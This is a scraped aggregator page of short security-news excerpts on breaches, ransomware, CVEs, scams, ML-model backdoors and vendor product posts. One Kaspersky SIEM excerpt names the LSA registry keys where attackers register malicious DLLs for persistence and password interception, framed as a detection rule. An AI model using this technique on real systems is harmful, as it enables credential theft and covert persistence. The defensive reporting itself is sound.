In their lust for stealing cryptocurrency and sensitive information, North Korean hackers are disguising themselves as remote IT workers, recruiters, and even venture capitalists.

James Elliott, a member of the Microsoft Threat Intelligence Center (MSTIC), described how North Korean IT workers had gained employment at hundreds of unsuspecting companies around the world.

A North Korean who manages to get hired by a company which doesn't realise they have employed a worker based in the sanctioned country clearly generates some income.

As the company describes, the members of Sapphire Sleet have impersonated venture capitalists or recruiters.

Companies are being urged to enhance their processes…

5 days, 20 hours ago @ bitdefender.com
No guarantees of payday for ransomware gang that claims to have hacked children’s hospital

One of Europe's busiest hospitals is investigating if it has been hacked by a notorious ransomware gang.

I strongly suspect that Alder Hey Children's Hospital will not give in to the extortionist's demands, and will simply refuse to pay a ransom.

They are not likely to be paid, and the attack on a children's hospital only increases the chances that they will one day find their collars felt by law enforcement.

Thankfully, as with the Alder Hey attack, there was no disruption to patient care.

Yes, they may be a soft target for cybercriminals - but that doesn't mean a guaranteed pay-day if a hospital is hacked.

5 days, 20 hours ago @ bitdefender.com
UK hospital, hit by cyberattack, resorts to paper and postpones procedures

A British hospital is grappling with a major cyberattack that has crippled its IT systems and disrupted patient care.

Wirral University Teaching Hospital (WUTH), part of the NHS, revealed on Monday that it had suffered a cybersecurity incident that continues to cause problems, and has forced its hospitals to postpone appointments and scheduled procedures.

WUTH, which manages Arrowe Park Hospital, Clatterbridge Hospital, and Wirral Women and Children's Hospital, proactively isolated its IT systems when it first detected the threat, forcing it to revert to manual processes and the use of pen-and-paper.

In a statement on its website, WUTH described the cyberattack as a "major incident", and th…

1 week, 2 days ago @ bitdefender.com
Mimic ransomware: what you need to know

1 week, 3 days ago @ tripwire.com
Smashing Security podcast #395: Gym hacking, disappearing DNA, and a social lockout

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Anna Brading.

1 week, 4 days ago @ grahamcluley.com
The AI Fix #26: Would AI kill sentient robots, and is water wet?

In episode 26 of The AI Fix, an AI does surgery on pork chops, holographic Jesus wants your consent to use cookies, Mark opens the pod bay doors, our hosts discover OpenAI’s couch potato health coach, and Graham finds a robot made of drain pipes.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

1 week, 5 days ago @ grahamcluley.com
Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records

A security researcher has blamed misconfigured implementations of Microsoft Power Pages for a slew of data breaches from web portals - including the leak of 1.1 million NHS employee records.

As Costello explains in a blog post, misconfigured access controls in Power Pages - a Microsoft software-as-a-service (SaaS) application used to help develop web portals - are exposing sensitive data to unauthorised anonymous users.

It seems churlish to blame Microsoft, the developer of Power Pages, entirely for the problem as in Costello's words it does "a great job of putting these warning banners and signs in your admin panel on Power Pages."

The challenge with those developing apps like Power Pages …

1 week, 5 days ago @ bitdefender.com
FlipaClip animation app data breach exposes details of almost 900,000 users

FlipaClip, an animation creation app that is particularly popular with youngsters, has exposed the details of over 890,000 users.

The vulnerability allowed unauthorised parties to access information about the app's users from an exposed Google Firebase server.

According to Visual Blasters, it was not possible to access the most sensitive information related to FlipaClip's users such as their financial details and passwords, or users' animation projects.

Particularly vulnerable may be FlipaClip's users aged under 18, who in 2022 were reported to make up some 70% of the app's userbase.

Unfortunately, there has been a long history of misconfigured Firebase setups leaving sensitive information …

1 week, 6 days ago @ bitdefender.com
750,000 patients’ medical records exposed after data breach at French hospital

2 weeks, 3 days ago @ tripwire.com
Companies 🏢
Kaspersky Blog
latest post 2 days, 21 hours ago
Improvements to the KUMA SIEM system in Q4 2024 | Kaspersky Blog

In attacks on the infrastructure of various companies, attackers are increasingly resorting to manipulation of the modules that interact with the Local Security Authority (LSA) process.

All three techniques involve planting malicious libraries in the C:\Windows\system32 directory and registering them in the SYSTEM\CurrentControlSet\Control\LSA\ branch of the system registry, under the Authentication Packages key for T1547.002, Security Packages for T1547.005 and Notification Packages for T1556.002.

Commands in cmd.exe and powershell.exe aimed at modifying the LSA registry branch and the Authentication Packages, Notification Packages and Security Packages keys.

This event records any changes made to objects …

2 days, 21 hours ago @ kaspersky.ru
How to protect yourself from surveillance via camera and microphone | Kaspersky Blog

Many members of this malware family can, among other things, spy on their victims and eavesdrop on them through the webcam and microphone; this was relevant ten years ago and it is just as relevant now.

How to physically protect yourself from surveillance via camera and microphone
Physical protection methods are useful and inconvenient at the same time, and you have to make compromises to ensure your privacy.

Disconnect the camera and microphone from the computer
Owners of desktop computers, nettops, or the laptop models mentioned above that have no built-in cameras and microphones can use external wired accessories.

In addition, you can find plenty of instructions online on how to physically disconnect the …

3 days, 17 hours ago @ kaspersky.ru
A complete overview of the capabilities and use of Network Detection & Response | Kaspersky Blog

Spy APTs, ransomware gang attacks, and any other threats targeted at a specific organization go to considerable lengths to avoid detection and to hinder after-the-fact analysis of their actions.

Firewalls, in their traditional form, protect only the organization's perimeter and do not help detect suspicious network activity inside it (for example, attackers taking over new computers).

Moreover, an organization always has routers, IoT devices, or network peripherals on which this kind of protection cannot be installed at all.

What is Network Detection and Response
NDR systems provide detailed monitoring of an organization's traffic and apply various …

4 days, 16 hours ago @ kaspersky.ru
Undeclared functionality in Machine Learning systems

In TensorFlow, another popular machine learning library, models in the .keras and HDF5 formats can contain a "lambda layer", which likewise essentially executes arbitrary Python commands.

The TensorFlow documentation carries a warning that a TensorFlow model, when executed, can read and write files, send and receive data over the network, and even spawn child processes.

The same goal can be achieved by changing the training labels in labeled datasets, as well as by injecting poisoned data into the process of adapting an already-trained model to a subject domain (fine-tuning).

In the example from the study, YOLO, a popular model for object detection in video, is modified so that it does not "see" in the frame …

5 days, 11 hours ago @ kaspersky.ru
Attack on sellers on classifieds platforms | Kaspersky Blog

This year a scheme involving an online video call has gained popularity: "buyers" ask to be shown the item over video, but in reality they are extracting bank access codes.

But there is a catch: first he asks to be shown the item over video.

The reveal
Under one pretext or another, and without even naming the feature, the buyer asks the seller to turn on screen sharing in WhatsApp.

If the victim turns on screen sharing, the scammers see the screen of their banking app and try to log in to the seller's online bank from their own computer.

We have prepared recommendations and tips to help you safely sell or buy any item on any classifieds platform.

6 days, 19 hours ago @ kaspersky.ru
Scams involving Telegram Premium gift subscriptions | Kaspersky Blog

There are subscriptions for everything: music, movies, fitness, security solutions, and even messengers.

Naturally, scammers exploit Telegram Premium gift subscriptions, sending them out left and right.

The phishing page looks like the regular Telegram browser login page.

Other ways scammers exploit Telegram gift subscriptions
Over the several years that Telegram Premium has existed, quite a few scam scenarios have accumulated.

Another typical Telegram-related scam trick is the distribution of APK files of a supposedly cracked Telegram app with a premium subscription included.

1 week, 3 days ago @ kaspersky.ru
Spoofing via CVE-2024-49040 | Kaspersky Blog

Among the vulnerabilities Microsoft addressed in its latest Patch Tuesday release of November 12 was CVE-2024-49040 in Exchange.

It seemed the vulnerability had been fixed, but, as it turned out, on November 14 Microsoft temporarily halted distribution of the Exchange update.

What the problem with CVE-2024-49040 is
CVE-2024-49040 is a vulnerability with a CVSS rating of 7.5 that affects Exchange Server 2019 and Exchange Server 2016 and is classified as "Important".

With the November 12 patch, Microsoft added a new feature that detects P2 FROM headers that do not conform to the RFC 5322 Internet Message Format standard, which was supposed to fix the situation.

It works in Kaspersky Security for Microsoft …

1 week, 5 days ago @ kaspersky.ru
"Black Friday 2024": how to protect your finances from scammers | Kaspersky Blog

The universal craze for low prices only plays into scammers' hands: their mailings, coupons, and phishing links dissolve easily in the mass of real offers.

It seems the scammers haven't noticed that the iPhone 15 and iPhone 16 already exist, and so does reliable protection for their users.

As a result, the victim voluntarily hands over their personal and banking data and risks losing money.

"Black Friday" for scammers
If you think nobody needs your data, or that it has already been leaked more than once, this story is for you.

This combination of protective features will keep you and your finances safe from most Black Friday scam schemes, and from much more.

1 week, 6 days ago @ kaspersky.ru
How to protect yourself from tracking via stalkerware and AirTag | Kaspersky Blog

Tracking is so simple and cheap that it is used by jealous spouses, car thieves, and even overly suspicious employers.

A smartphone and one of the Bluetooth tracker tags, such as the Apple AirTag, Samsung Smart Tag, or Chipolo, are perfectly suited for tracking.

According to one of the lawsuits against Apple, this method of spying is used in a wide range of crimes, from tracking exes to preparing murders.

As part of Kaspersky's anti-stalking campaign, we explain how you can be tracked and what to do about it.

How to protect yourself from tracking
To protect yourself from tracking both online and offline at the same time, we suggest Kaspersky for Android.

2 weeks, 2 days ago @ kaspersky.ru
Packages with an infostealer found in the PyPI repository | Kaspersky Blog

What the packages are and what they were used for
The malicious packages were uploaded to the repository by a single author and differed from one another only in name and description.

But in reality the operators of this attack built into the code a mechanism for interacting with a ChatGPT demo proxy, to convince the victim that the package worked.

How to stay safe
We promptly reported the backdoors in the gptplus and claudeai-eng packages to the PyPI administrators, and at the moment they have been removed from the repository.

We continue to monitor activity related to the JarkaStealer malware and to look for other threats in open-source software repositories.

We also recommend that developers examine open-source software packages with particular vigilance …

2 weeks, 3 days ago @ kaspersky.ru
CVE-2024-10924, an authentication bypass vulnerability in WordPress

Bad news for companies using WordPress-based sites with a two-factor authentication mechanism implemented via the Really Simple Security plugin.

The recently discovered vulnerability CVE-2024-10924 in this plugin allows an outsider to authenticate on the site as a legitimate user.

Why CVE-2024-10924 is dangerous
Ironic as it may sound, the CVE-2024-10924 vulnerability in the plugin named Really Simple Security has a CVSS rating of 9.8 and is classified as critical.

Essentially it is a bug in the authentication mechanism that allows an attacker to log in to the site as any of its registered users, with that user's full privileges (even …

2 weeks, 4 days ago @ kaspersky.ru
Kaspersky Password Manager update | Kaspersky Blog

We talk about the design update in the Kaspersky Password Manager password manager for mobile devices.

2 weeks, 5 days ago @ kaspersky.ru
Kaspersky Who Calls: setup guide | Kaspersky Blog

A Who Calls license can be purchased separately or as part of the comprehensive Kaspersky Plus and Kaspersky Premium security solutions, which protect not only against phone scammers but also against many other threats.

Installing Kaspersky Who Calls for Android
If you are installing the free version, pick a convenient app store via the link and download Who Calls.

If other Kaspersky apps, such as Kaspersky Plus or Kaspersky Premium, were already installed on your smartphone, Who Calls will offer "Quick sign-in" to the My Kaspersky account you use.

Installing Kaspersky Who Calls for iOS
To install the free version of Kaspersky Who Calls for iOS, go to the app page …

2 weeks, 6 days ago @ kaspersky.ru
Simple and effective tips for protecting yourself from hackers | Kaspersky Blog

… the master password for it, and everything else, from creating passwords to filling them in, will happen automatically.

Important nuances: the password manager needs to be installed on all your devices so you can enter passwords conveniently everywhere.

Data will sync between all your devices, and having saved a password on your smartphone, you will be able to auto-fill it into an input field on your computer, and vice versa.

Double-check links and attachments
Do not follow links or open files sent via messenger or email if you don't know who they are from and aren't expecting any messages.

Kaspersky Premium includes a manager for passwords and one-time authentication codes, anti-phishing protection and …

3 weeks, 3 days ago @ kaspersky.ru
CVE-2024-43451 allows stealing an NTLMv2 hash | Kaspersky Blog

But at the same time, all current versions of Windows are affected by the vulnerability.

Why CVE-2024-43451 is dangerous
CVE-2024-43451 allows an attacker to create a file that, once it lands on the victim's computer, lets the attacker steal an NTLMv2 hash.

Of course, CVE-2024-43451 alone is not enough for this; for a full-fledged attack they will have to use additional vulnerabilities, but someone else's NTLMv2 hash makes an attacker's life considerably easier.

At the moment we have no additional information about attacks in which CVE-2024-43451 is used in practice, but the vulnerability description clearly states that it is public, exploitable, and that exploitation attempts have been detected.

In addition, it is worth remembering that most a…

3 weeks, 4 days ago @ kaspersky.ru
Group-IB Blog
latest post None
Cisco Security Blog
latest post 4 days, 17 hours ago
A New Approach to Network Troubleshooting in the Multicloud World

1: Observability and network troubleshooting with Isovalent Enterprise, Amazon CloudWatch Network Monitoring and Splunk
The deep integration in practice
Let’s see how the Cisco and AWS integration would work in the real world.

Their network team had sophisticated tools for monitoring on-premises performance but found that they had gaps in their network visibility when traffic moved to the cloud.

When users complained about performance, the network team couldn’t tell if the problem was their application, the AWS network or somewhere in between.

This new solution extends ThousandEyes’ well known path visualization capabilities into the AWS network and also correlates how traffic flow impacts ap…

4 days, 17 hours ago @ blogs.cisco.com
How Cisco Uses the Isovalent Platform to Secure Cloud Workloads

At Cisco, we have integrated the Isovalent platform into our infrastructure to ensure our cloud workloads are protected without compromising on performance.

The Isovalent platform is based on the eBPF (extended Berkeley Packet Filter) technology that offers a very modern approach to securing cloud-native environments.

Isovalent embeds security at the kernel level to provide identity-based security, network segmentation, and traffic visibility without the overhead that’s usually associated with legacy solutions.

That means Cisco can better protect our workloads and scale with seamless network policy enforcement in our growing cloud infrastructure.

Conclusion
Integrating the Isovalent platform…

1 week, 5 days ago @ blogs.cisco.com
The Customer Adoption Journey of Cisco Secure Workload

This blog post explores the customer adoption journey of Cisco Secure Workload, highlighting key stages and best practices for successful implementation.

Evaluation: Exploring Cisco Secure Workload capabilities
Once aware of the need for a comprehensive workload security solution, the next step is evaluating Cisco Secure Workload.

Implementation: Deploying Cisco Secure Workload
After selecting Cisco Secure Workload, the deployment phase begins.

Customer Journey Map to Microsegmentation
Scaling: Expanding workload security across the organization
As businesses grow and their workloads expand, Cisco Secure Workload scales seamlessly.

The customer adoption journey of Cisco Secure Workload is a ste…

2 weeks, 2 days ago @ blogs.cisco.com
Cisco Secure Workload: Leading in Segmentation Maturity

Cisco Secure Workload is at the forefront of this shift, offering solutions to help organizations reach segmentation maturity.

Segmentation maturity is about how effectively an organization isolates its critical systems through workload segmentation to prevent lateral movement in case of a breach.

Cisco Secure Workload accelerates an organization’s journey to segmentation maturity, making it an essential component of a zero-trust strategy.

Cisco Secure Workload simplifies compliance by providing detailed visibility and fine-grained control over workload segmentation.

Cisco Secure Workload enables organizations to achieve and sustain segmentation maturity, adapting to their evolving needs.

2 weeks, 3 days ago @ blogs.cisco.com
Quantum Cryptography: What’s Coming Next

Incorporating PQC algorithms into transport protocols
To accommodate the new algorithms, it will be necessary to create new, or modify existing, transport protocols.

Making hardware quantum safe will therefore mean updating a variety of hardware components and functions that rely on cryptography.

For example, the Unified Extensible Firmware Interface (UEFI) needs to be adapted so it can handle PQC algorithms and keys.

PQC hardware availability
Cisco has offered quantum-safe hardware since 2013.

New quantum-safe editions of Secure Boot and Cisco Trust Anchor Technologies will be coming out soon, implementing the new NIST PQC standards.

2 weeks, 4 days ago @ blogs.cisco.com
Happy Third Birthday to Secure MSP Center

It is hard to believe that this November, we will be celebrating the third anniversary of the launch of Secure MSP Center.

We have come a long way from having MSPs buy single products to offering a streamlined, comprehensive program and dashboard for MSPs through Secure MSP Center and MSP Hub.

We took this feedback to heart and built Secure MSP Center.

You can learn more about the benefits of this dashboard from my previous blog: Up your Quality of Life with Secure MSP Hub and Secure MSP Center.

To learn more visit Secure MSP Center or email us at MSP Sales.

2 weeks, 4 days ago @ blogs.cisco.com
Reducing Help Desk Tickets With Cisco’s User Protection Suite

While there are many benefits of help desk tickets, there are also hidden costs.

How to reduce help desk tickets
One way to reduce help desk tickets is to implement technology solutions that make access easy for end users.

And by improving the user experience for remote access, this proactively reduces the creation of help desk tickets.

Impact of User Protection Suite tools
Customers who are using Cisco’s User Protection Suite tools have seen the positive impact of reducing help desk tickets, and the burden on the IT team.

Overall, help desk tickets are an important tool to enable organizations to operate.

2 weeks, 5 days ago @ blogs.cisco.com
Business Leader’s Guide for a Successful Microsegmentation Project

Here’s how to ensure your microsegmentation project is a success, without getting lost in the technical details.

Microsegmentation is a long-term investment in your organization’s security, providing not only protection today but also adaptability for tomorrow’s challenges.

Gathering the ingredients: Preparation is key
A successful microsegmentation project requires more than just your IT or security department — it needs a cross-functional team.

For this initiative to truly work, the project team must include voices from across the organization: IT, security, application owners, key business leaders and project sponsors.

This knowledge, held by teams across the business, is critical to a su…

2 weeks, 6 days ago @ blogs.cisco.com
Robust Intelligence, Now Part of Cisco, Recognized as a 2024 Gartner® Cool Vendor™ for AI Security

Cisco is excited to share that Robust Intelligence, a recently acquired AI security startup, has been mentioned in the first ever 2024 Gartner Cool Vendors for AI Security report.

The responsibility of AI security is shared by those developing AI applications and the security and governance teams protecting sensitive data at an organizational level.

As a pioneer in this space, Robust Intelligence introduced the first-ever AI Firewall to the market as part of their comprehensive AI security platform.

Robust Intelligence continues to be at the forefront of AI security innovation, from creating the industry’s first AI Firewall to conducting breakthrough AI research.

Gartner, Cool Vendors for A…

3 weeks, 6 days ago @ blogs.cisco.com
Converge Your WAN and Security With Cisco Firewall

Cisco Secure Firewall is an exceptionally robust firewall solution with innovative features such as Snort IPS, URL filtering, and malware defense.

However, organizations can overcome these challenges by leveraging a secure firewall solution for simplified and secure branch deployment.

The management center integrates with the Cisco Security Cloud and Cisco Defense Orchestrator (CDO) for this functionality.

More details about the templates can be found here: Zero touch provisioning with Cisco Firewall Management Center Templates – Cisco Blogs.


1 month ago @ blogs.cisco.com
Leveraging Threat Intelligence in Cisco Secure Network Analytics, Part 2

In this part, we cover leveraging public Cisco Talos blogs and third-party threat intelligence data with Cisco Secure Network Analytics.

Cisco Talos Blogs
The talented researchers at Cisco Talos regularly publish blogs on threats and vulnerabilities.

We can use these blogs and GitHub files to build Custom Security Events in Cisco Secure Network Analytics.

They work the same way we handled internal threat intelligence in the first part of this blog or Cisco Talos blogs shown above.

Host group parent/child relationships
A good practice for building parent and child host groups is to create a new parent host group for any distinct sources.

1 month ago @ blogs.cisco.com
NetSecOPEN: Cisco Firewall Outperforms Competition in Real-World Testing

The NetSecOPEN report confirms the advanced security capabilities of Cisco Secure Firewall, with 98% threat efficacy, 100% detection for evasive threats, and 100% block rate under heavy load conditions.

In testing, with its cutting-edge FPGA design, Cisco Secure Firewall 3105 maintained an impressive 4.17 Gbps throughput.

With Cisco Secure Firewall, businesses can confidently enable advanced security features without compromising speed.

Cisco Secure Firewall empowers you to face the future without trade-offs, offering seamless protection today and tomorrow.

We have verified what Cisco Secure Firewall has steadily offered: industry-leading protection with effective speed while closing securi…

1 month ago @ blogs.cisco.com
Overview of Cybersecurity Regulations in the Middle East Region, Part 1

The Middle East region is quickly emerging as a new, dynamic player in the world of cybersecurity regulations.

State of Qatar
The State of Qatar’s cybersecurity regulatory framework consists of legislation, international standards and strategy guidelines placed within various cybersecurity frameworks, introduced across different strategic and business sectors.

It also includes strategies focused on setting up a collaborative environment aimed at building and cultivating national cybersecurity capabilities.

As part of the National Cybersecurity Strategy (NCS), the National Cybersecurity Authority (NCA) was established in 2017 to regulate and improve the cybersecurity landscape in the KSA wit…

1 month ago @ blogs.cisco.com
Trust Through Transparency: Regulation’s Role in Consumer Confidence

For the past six years, Cisco has been studying consumer sentiment across the privacy landscape and the evolution of privacy from a compliance matter to a consumer requirement.

Growing regulatory awareness fosters consumer confidence
There are now more than 160 countries with national or multinational privacy laws in place.

With the strong correlation between regulatory awareness and consumer confidence, transparency can be a differentiator when it comes to customer trust.

Transparency as a driver of trust in the AI era
This consumer awareness coincides with the rapid advancement of Generative AI (Gen AI).

Explore these trends and more in the Cisco 2024 Consumer Privacy Survey.

1 month, 1 week ago @ blogs.cisco.com
SOC Findings Report From RSA Conference 2024

Discover key insights from the SOC Findings Report at RSA Conference 2024, co-released by Cisco and NetWitness for Cybersecurity Awareness Month.

1 month, 2 weeks ago @ feedpress.me
Microsoft Security
last post 3 days, 12 hours ago
Why security leaders trust Microsoft Sentinel to modernize their SOC

Security information and event management (SIEM) solutions have long served as the indispensable nerve center for the security operations center (SOC).

Microsoft Sentinel: Transform SecOps with Microsoft Sentinel, powered by the cloud and AI.

Learn more about Microsoft Sentinel, and read the Microsoft Sentinel datasheet.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.


3 days, 12 hours ago @ microsoft.com
8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management

Delivering on identity and access management for customers
We believe our 2024 Gartner® Magic Quadrant™ recognition validates our commitment to delivering a comprehensive, AI-powered and automated identity portfolio to customers, with Microsoft Entra.

Provide only the access necessary with right-size permissions, access lifecycle management, and least-privilege access for any identity.

You can learn more by reading the full 2024 Gartner® Magic Quadrant™ for Access Management report.

Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact.

Gartner, Magic Quadrant for Access Management, 2 December 2024…

3 days, 13 hours ago @ microsoft.com
Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage

Compromise and post-compromise activities
Since November 2022, Microsoft Threat Intelligence has observed Secret Blizzard compromising the C2 infrastructure of a Pakistan-based espionage cluster that we track as Storm-0156.

The initial access mechanism used by Secret Blizzard to compromise Storm-0156 infrastructure is currently not known.

Secret Blizzard and Storm-0156 chain of compromise
In August 2024, Microsoft observed Secret Blizzard using a CrimsonRAT compromise that Storm-0156 had established in March 2024.

Search for file-based IOCs:
Search for network IOCs:
Indicators of compromise: Storm-0156 compromise-associated malware
Indicator | Type | Association | Last seen
e298b83891b192b8a2782e638e7f5…

4 days, 13 hours ago @ microsoft.com
Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024

Identity and network access is the foundation of modern cybersecurity, with 66% of attacks involving compromised identities.¹ Equipping identity professionals to secure access to everything has never been so critical.

At Gartner IAM Summit, Microsoft Security will showcase the Microsoft Entra Suite—a complete Zero Trust employee access solution.

Last month at Microsoft Ignite we announced new capabilities—now in preview—for Microsoft Security Copilot, which is now embedded in Microsoft Entra.

How to engage with Microsoft Security at Gartner IAM Summit
We’re excited to show off the new capabilities of Copilot in Microsoft Entra, as well as other Entra capabilities, throughout our presence at …

4 days, 14 hours ago @ microsoft.com
Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition

This was a major theme across the majority of the big news and reveals from Microsoft Security at Microsoft Ignite 2024.

Tech Community Live: Microsoft Security. Ask us anything about simplified, end-to-end, AI-driven protection with Microsoft Security!

AI transformation requires security transformation
Before Microsoft Ignite officially began, hundreds of security and IT professionals gathered early for the Microsoft Ignite Security Forum to hear from Microsoft Security product leaders about Microsoft’s threat intelligence and AI research, among other security strategy topics.

The keynote ended with Executive Vice President of Microsoft Security Charlie Bell, joined by Corporate V…

6 days, 13 hours ago @ microsoft.com
Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON

When the target contacts the threat actor, the threat actor sends a script – a .scpt file (Mac) or a Visual Basic Script (.vbs) file (Windows) – to “fix the connection issue”.

The threat actor then works towards obtaining cryptocurrency wallets and other credentials on the compromised device, enabling the threat actor to steal cryptocurrency.

These threat actors continue to conduct operations while using tooling and techniques against targets that often overlap with another threat actor’s operation.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To hear stories and…

2 weeks, 2 days ago @ microsoft.com
AI innovations for a more secure future unveiled at Microsoft Ignite

Company delivers advances in AI and posture management, unprecedented bug bounty program, and updates on its Secure Future Initiative.


2 weeks, 5 days ago @ microsoft.com
Microsoft Data Security Index annual report highlights evolving generative AI security needs

84% of surveyed organizations want to feel more confident about managing and discovering data input into AI apps and tools.


3 weeks, 4 days ago @ microsoft.com
DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration

As part of the department’s ongoing assessments of zero trust implementation, Flank Speed just underwent its second round of security assessments sponsored by the DoD Zero Trust Portfolio Management Office (PfMO)—with tremendous results.

DoD Zero Trust Report: The United States Navy is proving that Zero Trust goes beyond compliance standards and has become a proven security methodology with real world results.

The DoD expanded beyond traditional penetration testing to thoroughly evaluate all 152 zero trust activities.

This comprehensive and extensible zero trust platform supports a range of environments including hybrid cloud, multicloud, and multiplatform needs.

Also, follow us on LinkedIn …

3 weeks, 6 days ago @ microsoft.com
More value, less risk: How to implement generative AI across the organization securely and responsibly

To maximize the advantages of generative AI, we need to strike a balance between addressing the potential risks and embracing innovation.

In our recent strategy paper, “Minimize Risk and Reap the Benefits of AI,” we provide a comprehensive guide to navigating the challenges and opportunities of using generative AI.

We offer best practices for aligning AI initiatives with legal and ethical standards, including establishing ethics committees and leveraging frameworks like the NIST AI Risk Management Framework.

Explore concrete actions for the future
As your organization adopts generative AI, it’s critical to implement responsible AI principles, including fairness, reliability, safety, privacy, …

1 month ago @ microsoft.com
Zero Trust Workshop: Advance your knowledge with an online resource

Zero Trust Workshop: A comprehensive technical guide to help customers and partners adopt a Zero Trust strategy and deploy security solutions end-to-end to secure their organizations.

The Zero Trust Workshop is a great starting point for our customers who want to embrace Zero Trust principles, but don’t know how to align the technology they already own.

The Zero Trust Strategy workshop: This is a guided breakdown of the Zero Trust areas according to the standard Zero Trust pillars (Identity, Devices, Data, Network, Infrastructure and Application, and Security Operations).

I invite you to check out the Zero Trust Workshop site where we have detailed training videos and content.

Additional res…

1 month ago @ microsoft.com
How Microsoft Defender for Office 365 innovated to address QR code phishing attacks

Unique characteristics of QR code phishing campaigns

Like with other phishing techniques, the goal of QR code phishing attacks is to get the user to click on a malicious link that seems legitimate.

The necessity of innovation in QR code phishing defense
Innovation in the face of evolving QR code phishing risk is not just beneficial, it’s imperative.

In response to the growing threat of QR code phishing, Microsoft Defender for Office 365 took decisive action to leverage advanced machine learning and AI—developing robust defenses capable of detecting and neutralizing QR code phishing attacks in real time.

QR code phishing blocked by Microsoft Defender f…

1 month ago @ microsoft.com
Microsoft now a Leader in three major analyst reports for SIEM

Microsoft is positioned in the Leaders Category in the 2024 IDC MarketScape for worldwide SIEM for Enterprise, making it the third major analyst report in SIEM to name Microsoft as a Leader.

1 month, 1 week ago @ techcommunity.microsoft.com
Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network

Microsoft assesses that credentials acquired from CovertNetwork-1658 password spray operations are used by multiple Chinese threat actors.

Microsoft assesses that multiple Chinese threat actors use the credentials acquired from CovertNetwork-1658 password spray operations to perform computer network exploitation (CNE) activities.

Steps taken to prepare the router for password spray operations
CovertNetwork-1658 is observed conducting its password spray campaigns through this proxy network to ensure the password spray attempts originate from the compromised devices.

Password spray activity from CovertNetwork-1658 infrastructure
Microsoft has observed multiple password spray campaigns origina…

1 month, 1 week ago @ microsoft.com
Google Online Security Blog
last post 3 days, 12 hours ago
Announcing the launch of Vanir: Open-source Security Patch Validation

Today, we are announcing the availability of Vanir, a new open-source security patch validation tool.

In collaboration with the Google Open Source Security Team, we have incorporated feedback from our early adopters to improve Vanir and make it more useful for security professionals.

These algorithms have low false-alarm rates and can effectively handle broad classes of code changes that might appear in code patch processes.

The Vanir signatures for Android vulnerabilities are published through the Open Source Vulnerabilities (OSV) database.

You can also contribute to Vanir by providing vulnerability data with Vanir signatures to OSV.

3 days, 12 hours ago @ security.googleblog.com
Leveling Up Fuzzing: Finding more vulnerabilities with AI

But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets.

The ideal solution would be to completely automate the manual process of developing a fuzz target end to end:
Drafting an initial fuzz target.

Running the corrected fuzz target for a longer period of time, and triaging any crashes to determine the root cause.

In January 2024, we open sourced the framework that we were building to enable an LLM to generate fuzz targets.

New results: More code coverage and discovered vulnerabilities
We’re now able to automatically gain more coverage in 272 C/C++ projects on OSS-Fuzz (up from 160), …

2 weeks, 4 days ago @ security.googleblog.com
Retrofitting Spatial Safety to hundreds of millions of lines of C++

Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade.
[Figure: Breakdown of memory safety CVEs exploited in the wild by vulnerability class]
Google is taking a comprehensive approach to memory safety.

This leads to an exponential decline in memory safety vulnerabilities and quickly improves the overall security posture of a codebase, as demonstrated by our post about Android's journey to memory safety.

We’ve begun by enabling hardened libc++, which adds bounds checking to standard C++ data structures, eliminating a significant class of spatial safety bugs.

This improves spat…

3 weeks, 2 days ago @ security.googleblog.com
Safer with Google: New intelligent, real-time protections on Android to keep you safe

That’s why we’re using the best of Google AI to identify and stop scams before they can do harm with Scam Detection.

Scam Detection is off by default, and you can decide whether you want to activate it for future calls.

Cutting-edge AI protection, now on more Pixel phones: Gemini Nano, our advanced on-device AI model, powers Scam Detection on Pixel 9 series devices.

We look forward to learning from this beta and your feedback, and we’ll share more about Scam Detection in the months ahead.

3 weeks, 4 days ago @ security.googleblog.com
5 new protections on Google Messages to help keep you safe

Every day, over a billion people use Google Messages to communicate.

That’s why we’ve made security a top priority, building in powerful on-device, AI-powered filters and advanced security that protects users from 2 billion suspicious messages a month.

With end-to-end encrypted¹ RCS conversations, you can communicate privately with other Google Messages RCS users.

We're committed to constantly developing new controls and features to make your conversations on Google Messages even more secure and private.

As part of cybersecurity awareness month, we're sharing five new protections to help keep you safe while using Google Messages on Android:

1 month, 2 weeks ago @ security.googleblog.com
Safer with Google: Advancing Memory Safety

Our internal analysis estimates that 75% of CVEs used in zero-day exploits are memory safety vulnerabilities.

Our Secure by Design commitment emphasizes integrating security considerations, including robust memory safety practices, throughout the entire software development lifecycle.

This post builds upon our previously reported Perspective on Memory Safety, and introduces our strategic approach to memory safety.

By open-sourcing these tools, we've empowered developers worldwide to reduce the likelihood of memory safety vulnerabilities in C and C++ codebases.

Migration to Memory-Safe Languages (MSLs)
The first pillar of our strategy is centered on further increasing the adoption of memory-s…

1 month, 3 weeks ago @ security.googleblog.com
Bringing new theft protection features to Android users around the world

Situations like Janine’s highlighted the need for a comprehensive solution to phone theft that exceeded existing tools on any platform.

These advanced theft protection features are now available to users around the world through Android 15 and a Google Play Services update (Android 10+ devices).

These theft protection features are just one example of how Android is working to provide real-world protection for everyone.

You can turn on the new Android theft features by clicking here on a supported Android device.

Learn more about our theft protection features by visiting our help center.

1 month, 3 weeks ago @ security.googleblog.com
Using Chrome's accessibility APIs to find security bugs

If only the whole tree of Chrome UI controls were exposed, somehow, such that we could enumerate and interact with each UI control automatically.

We need to amortize that cost over thousands of test cases by running a batch of them within each browser invocation.

Yet this is tricky, since Chrome UI controls are deeply nested and often anonymous.

This approach has proven to be about 80% as quick as the original ordinal-based mutator, while providing stable test cases.

